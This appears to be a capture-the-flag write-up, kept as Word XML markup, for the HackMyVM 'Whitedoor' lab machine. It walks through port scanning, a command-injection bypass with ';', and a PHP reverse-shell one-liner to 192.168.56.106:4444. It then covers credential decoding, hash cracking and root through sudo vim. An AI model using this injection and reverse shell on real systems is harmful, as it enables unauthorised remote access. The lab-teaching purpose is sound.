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So today we are going to solve another easy level machine from HackMyVM which is Whitedoor.</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As Usual we start with both machines on host-only adapter and we use kali today.</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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="48260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And here as we can see this our machine is started but unlike other machines we do get banner information like IP on this page we did not so we start with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netdiscover </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tool to find ip within the range of our network card.</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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netdiscover -i eth0(Network card)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3187700"/>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Here we get the IP which is 192.168.56.117</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We start with full port scan</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nmap 192.168.56.117 -p-    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Starting Nmap 7.98 ( https://nmap.org ) at 2026-05-29 00:39 +1245</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap scan report for 192.168.56.117</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host is up (0.000099s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Not shown: 65532 closed tcp ports (reset)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">21/tcp open  ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80/tcp open  http</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MAC Address: 08:00:27:56:5A:0C (Oracle VirtualBox virtual NIC)</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Now performing service and detection version scan.</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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3175000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We continue with this also as we can see that FTP anonymous login is allowed here we will login to the server.</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 xml:space="preserve">But it was rabbit hole logging into the ftp server it get us nothing other than </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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">¡Good luck!</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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="37084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Moving with this further we can look deep into the</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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 80 we just see that </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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="31623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Let’s try to fuzz deeper into this and get back to what like directory fuzzing and source page enumeration.</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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3175000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Within the page source we see this all and moving with this we will start with directory fuzzing.</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So here we get that command form so it is just simple which we know that this all is about to get the form.</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ffffff"/>
          <w:shd w:fill="464646" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also when we try to execute command it says only </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command is eligible but we can bypass that formation with ; so we did start reverse shell on port 4444 and we will get ls;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="464646" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php -r '$sock=fsockopen("</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="426992"/>
          <w:shd w:fill="464646" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.106</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="464646" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">",</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="426992"/>
          <w:shd w:fill="464646" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="464646" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">);`</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="426992"/>
          <w:shd w:fill="464646" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="464646" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3`;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="464646" w:val="clear"/>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ffffff"/>
          <w:shd w:fill="464646" w:val="clear"/>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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3187700"/>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this the we get the reverse shell</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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3213100"/>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So let’s try to stabilize the shell first.</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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3162300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="0f1115"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We did </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="0f1115"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On target: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="0f1115"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="ebeef2" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">script -qc /bin/bash /dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="0f1115"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="0f1115"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="ebeef2" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">script /dev/null -c /bin/bash</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43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="34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export TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">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Press Ctrl+Z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">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Locally: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="0f1115"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="ebeef2" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty raw -echo; fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">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Press Enter, then </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="0f1115"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="ebeef2" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reset</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To stabilize the shell so let’s look around for more hints.</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So after keeping eye around we finally get some hint.</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3175000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whiteshell:VkdneGMwbHpWR2d6VURSelUzZFBja1JpYkdGak5Rbz0K</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And after trying to decode this with cyberchef we get to know it’s base64</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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And with this password we are now the whiteshell user.</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3175000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So we have this white shell now let’s look around what we can let’s try for user.txt</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="914400"/>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So with,</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find / -type f -name ‘user.txt’ 2&gt;/dev/null</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now read user.txt</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But we still don’t have perms to read the user.txt</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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3187700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But we have the hash file so let’s try to crack it out.</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3162300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So now we have the password let’s try to switch the user and then read the user.txt file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we have the user.txt Y0uG3tTh3Us3RFl4g!!</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Which we required to read</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3200400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8"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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ITS TIME FOR PRIVILEGE ESCALATION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So we start with sudo -l which gives us that we can run sudo command with /usr/bin/vim which can help us directly read the root.txt file</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3187700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So let’s read the root.txt file</w:t>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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2540000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we have the root.txt file but if we want to become root user let’s move to </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gtfobins.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which will help us find some specific commands</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Which is simple</w:t>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do sudo /usr/bin/vim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And as soon as screen appears do write 🐚</w:t>
      </w:r>
    </w:p>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And you will be the root user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1955800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9"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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jai Shri Ram Thank You.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
